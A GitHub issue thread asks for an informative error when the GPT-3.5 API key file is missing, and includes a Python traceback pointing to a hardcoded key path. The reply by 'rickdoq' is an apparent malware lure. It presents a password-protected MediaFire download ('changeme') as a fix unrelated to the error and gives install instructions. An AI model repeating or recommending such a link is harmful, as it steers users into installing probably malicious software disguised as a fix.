### ISSUE TITLE
Feature request: informative error message when lacking GPT 3.5 API key

### ISSUE THREAD

**Issue by DrKenReid** [mmore500/curaitor#40]
```
C:\Users\Ken\curaitor>streamlit run script\curaitor.py

  You can now view your Streamlit app in your browser.

  Local URL: http://localhost:8501
  Network URL: http://10.0.0.122:8501

None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.
Cleaned text has been written to file: output\text_files\2402.00234v1_output_text.txt
Processing files:   0%|                                                                          | 0/1 [00:00<?, ?it/s]document has 17 pages.
Processing files (Processed: 1/1): 100%|█████████████████████████████████████████████████| 1/1 [00:01<00:00,  1.19s/it]
Cleaned text has been written to file: output\text_files\2402.00234v1_output_text.txt
Cleaning 2402.00234v1_output_text.txt...
2402.00234v1_output_text.txt has been cleaned.
Cleaning paper3_output_text.txt...
paper3_output_text.txt has been cleaned.
Cleaning paper4_output_text.txt...
paper4_output_text.txt has been cleaned.
Cleaning paper5_output_text.txt...
paper5_output_text.txt has been cleaned.
2024-08-30 12:28:13.223 Uncaught app exception
Traceback (most recent call last):
  File "C:\Users\Ken\AppData\Local\Programs\Python\Python312\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 589, in _run_script
    exec(code, module.__dict__)
  File "C:\Users\Ken\curaitor\script\curaitor.py", line 75, in <module>
    process_files(
  File "C:\Users\Ken\curaitor\script\textSegments.py", line 48, in process_files
    client = OpenAI(api_key=read_key(key_file_path))
                            ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Ken\curaitor\script\textSegments.py", line 34, in read_key
    with open(key_file_path, "r") as file:
         ^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/Users/riteshk/Library/CloudStorage/Box-Box/Research-postdoc/oxRSE-project/API_KEY'
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
